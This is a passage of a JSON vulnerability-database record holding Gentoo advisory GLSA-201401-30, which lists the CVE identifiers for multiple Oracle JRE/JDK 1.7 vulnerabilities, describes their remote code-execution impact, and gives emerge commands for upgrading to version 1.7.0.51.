"CVE-2013-2421", "CVE-2012-3159", "CVE-2013-1518", "CVE-2013-5776", "CVE-2012-5087", "CVE-2013-5788", "CVE-2013-5905", "CVE-2013-0809", "CVE-2013-5904", "CVE-2013-5888", "CVE-2013-2452", "CVE-2012-3342", "CVE-2013-2451", "CVE-2013-5893", "CVE-2013-5842", "CVE-2014-0387", "CVE-2012-5085", "CVE-2012-5076", "CVE-2013-5810", "CVE-2013-5830", "CVE-2013-2473", 
"CVE-2012-5079", "CVE-2012-4416", "CVE-2013-5898", "CVE-2012-0507", "CVE-2012-5075", "CVE-2013-1473", "CVE-2013-5832", "CVE-2012-3136", "CVE-2013-1488", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2014-0375", "CVE-2012-5081", "CVE-2012-5067", "CVE-2013-5817", "CVE-2012-0503", "CVE-2012-3174", "CVE-2011-5035", "CVE-2013-2419", "CVE-2012-1723", "CVE-2013-2463", "CVE-2013-1563", "CVE-2013-2469", "CVE-2013-5787", "CVE-2013-5852", "CVE-2012-1726", "CVE-2014-0418", "CVE-2013-0351", "CVE-2013-2465", "CVE-2014-0373", "CVE-2013-1537", "CVE-2013-3743", "CVE-2013-5854", "CVE-2012-0498", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5887", "CVE-2012-0506", "CVE-2014-0408", "CVE-2013-5825", "CVE-2012-1717", "CVE-2012-1721", "CVE-2014-0376", "CVE-2013-2423", "CVE-2014-0422", "CVE-2013-5789", "CVE-2014-0411", "CVE-2013-2439", "CVE-2013-1561", "CVE-2013-5823", "CVE-2013-0409", "CVE-2013-5895", "CVE-2013-0438", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2013-2428", "CVE-2012-5083", "CVE-2013-5843", "CVE-2012-5088", "CVE-2013-5899", "CVE-2013-2429", "CVE-2013-5812", "CVE-2013-5849", "CVE-2012-5086", "CVE-2013-5896", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-1532", "CVE-2012-5077", "CVE-2013-1486", "CVE-2014-0417", "CVE-2013-5780", "CVE-2013-5910", "CVE-2013-1487", "CVE-2013-5906", "CVE-2013-0430", "CVE-2013-0445", "CVE-2012-5069", "CVE-2014-0428", "CVE-2012-3216", "CVE-2014-0382", "CVE-2012-0505", "CVE-2013-5824", "CVE-2012-5084", "CVE-2013-5831", "CVE-2012-1718", "CVE-2013-2440", "CVE-2013-2434", "CVE-2013-2464", "CVE-2013-2458", "CVE-2012-3213", "CVE-2013-2459", "CVE-2012-5071", "CVE-2013-5814", "CVE-2013-2442", "CVE-2012-0499", "CVE-2012-0501", "CVE-2013-0446", "CVE-2013-2432", "CVE-2012-1722", "CVE-2014-0368", "CVE-2013-2443", "CVE-2014-0423", "CVE-2013-1481", "CVE-2013-5775", "CVE-2013-2446", "CVE-2012-0547", "CVE-2013-5829", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2400", "CVE-2013-2472", "CVE-2013-2438", 
"CVE-2013-1540", "CVE-2012-0500", "CVE-2013-2467", "CVE-2013-5907", "CVE-2013-1493", "CVE-2013-5902", "CVE-2012-1531", "CVE-2013-2444", "CVE-2013-3744", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-5844", "CVE-2013-0437", "CVE-2012-4681", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-1557", "CVE-2012-0504", "CVE-2013-2426", "CVE-2014-0424", "CVE-2013-2455", "CVE-2013-5819", "CVE-2013-2422", "CVE-2013-2435", "CVE-2013-2383", "CVE-2013-1484", "CVE-2013-1564", "CVE-2013-1558", "CVE-2013-5774", "CVE-2012-1724", "CVE-2013-0422", "CVE-2012-5068", "CVE-2014-0403", "CVE-2013-3829", "CVE-2012-1682", "CVE-2012-3143", "CVE-2012-0502", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-2425", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-1569", "CVE-2013-5838", "CVE-2013-2412", "CVE-2013-0449", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2013-5801", "CVE-2014-0416", "CVE-2013-2449", "CVE-2013-2466", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-0423", "CVE-2013-5772", "CVE-2013-0419"], "description": "### Background\n\nThe Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE) provide the Oracle Java platform (formerly known as Sun Java Platform). \n\n### Description\n\nMultiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jdk-bin-1.7.0.51\"\n \n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jre-bin-1.7.0.51\"\n \n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-java-1.7.0.51\"\n \n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. \n\nNOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically.", "edition": 1, "modified": "2014-01-27T00:00:00", "published": "2014-01-27T00:00:00", "id": "GLSA-201401-30", "href": "https://security.gentoo.org/glsa/201401-30", "type": "gentoo", "title": "Oracle JRE/JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}